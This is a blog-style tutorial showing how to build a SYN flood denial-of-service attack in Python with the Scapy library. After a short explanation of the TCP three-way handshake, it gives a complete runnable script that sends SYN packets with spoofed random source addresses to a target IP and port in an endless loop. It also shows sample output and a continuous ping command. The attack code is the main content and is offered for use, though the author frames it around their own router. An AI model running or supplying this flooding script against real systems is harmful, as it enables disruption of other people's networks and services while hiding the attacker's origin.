How to Make a SYN Flooding Attack in Python

By | September 27, 2021
How to Make a SYN Flooding Attack in Python

TCP (Transmission Control Protocol) is the standard protocol over networks, which is used to exchange data between network conversations.

TCP uses a connection-oriented method to set up the connection between the two networks. Generally, the connection setting method of TCP is also known as “Three-Way handshake”.

Vamware

In the Three Handshake method of TCP, first, the client sends the Synchronous(SYN) packets to the server as a request, then the server or receiving end accept the SYN sent by the client and as a response, it sent back the SYN with Acknowledgement (ACK). After receiving the SYN and Acknowledgement (ACK) from the server, the client sends the Acknowledgement to the server and the TCP connection established between the networks.

What is an SYN-FLOOD Attack?

In an SYN-Flood Attack, the Malicious attackers rapidly sent a lot of SYN packet to the server or receiver without acknowledging the received SYN+ACK request.

By sending rapid SYN packets can lead the server to resource starvation or failure. And these types of server attacks are very common on the Internet.

And In this tutorial, we will learn how to perform SYN flood Attacks in Python using the Python SCAPY library.

Install Required Library

For this tutorial, we will be using the Python library Scapy which is a powerful open-source packet manipulating library. Scapy is mostly used in Ethical hacking with Python, and to achieve our objective of SYN flood attack in Python, Scapy is the perfect library.

Run the following pip command to install the Python Scapy Library.

pip install scapy

Now open your favorite Python ide or text editor and start coding with us.

Python Implementation

Let’s import the scapy library in our python script.

from scapy.all import *

For this tutorial, I will be sending Flood Attack against my own router. And for that here I will be mentioning my router IP address.

To get your Default Gateway IP address run ipconfig/all or ip routeon your Windows command prompt or macOS/Linux terminal respectively.

#default gateway IP 
target_ip ="192.168.43.1"

#http port
target_port = 80

Now let’s define a function synFloodAttackwhich will send the TCP Synchronous packets to the target IP address.

def synFloodAttack(target_ip, sport, dport):
    s_addr = RandIP()   #random Ip address
    pkt =IP(src= s_addr, dst= target_ip)/ TCP(sport =sport, dport=dport, seq= 1505066, flags="S")
    send(pkt)

The RandIP()will define a random IP address every time the synFloodAttack()function is called.

The packet variablepktconsist of the IP and the TCP method, for the Synchronous requests.

The flag "S" defines that the SYN should be on.

Now call the synFloodAttack()function in an Infinite while loop, so it could send rapid SYN request to the target IP address.

while True:
    #type CTRL +C to stop the SYN pkt
    synFloodAttack(target_ip, 1234 , target_port )

Now put all the code together and Execute.

#Python program to Make an SYN Flooding Attack

from scapy.all import *

#default gateway IP
target_ip ="192.168.43.1"

#http port
target_port = 80

def synFloodAttack(target_ip, sport, dport):
    s_addr = RandIP()   #random Ip address
    pkt =IP(src= s_addr, dst= target_ip)/ TCP(sport =sport, dport=dport, seq= 1505066, flags="S")
    send(pkt)

while True:
    #type CTRL +C to stop the SYN pkt
    synFloodAttack(target_ip, 1234 , target_port )

Output

Sent 1 packets
.
Sent 1 packets
.
Sent 1 packets
.
Sent 1 packets
.
Sent 1 packets
.
Sent 1 packets
.
Sent 1 packets
.
Sent 1 packets
.
Sent 1 packets
.
Sent 1 packets
.
Sent 1 packets

After executing the script within a few seconds you might lose your connection to the router. To stop the script Press CTRL+C button.

You can also send packets from your Command Prompt or terminal using the ping command.

ping -t "192.168.43.1"

On windows, you will see a similar output.

press CTRL+Cto stop the process.

Conclusion

In this Python tutorial, we learned how to use the Python Scapy Libary to perform the TCP SYN Flood attack. The SYN flood attack is nothing, but only sending SYN requests rapidly without accepting or acknowledging the back response. These days many servers are immune to this type of Attack, still, it’s good to know how to perform this SYN Flood Attack in Python.

People are also reading: 

Leave a Reply

Your email address will not be published. Required fields are marked *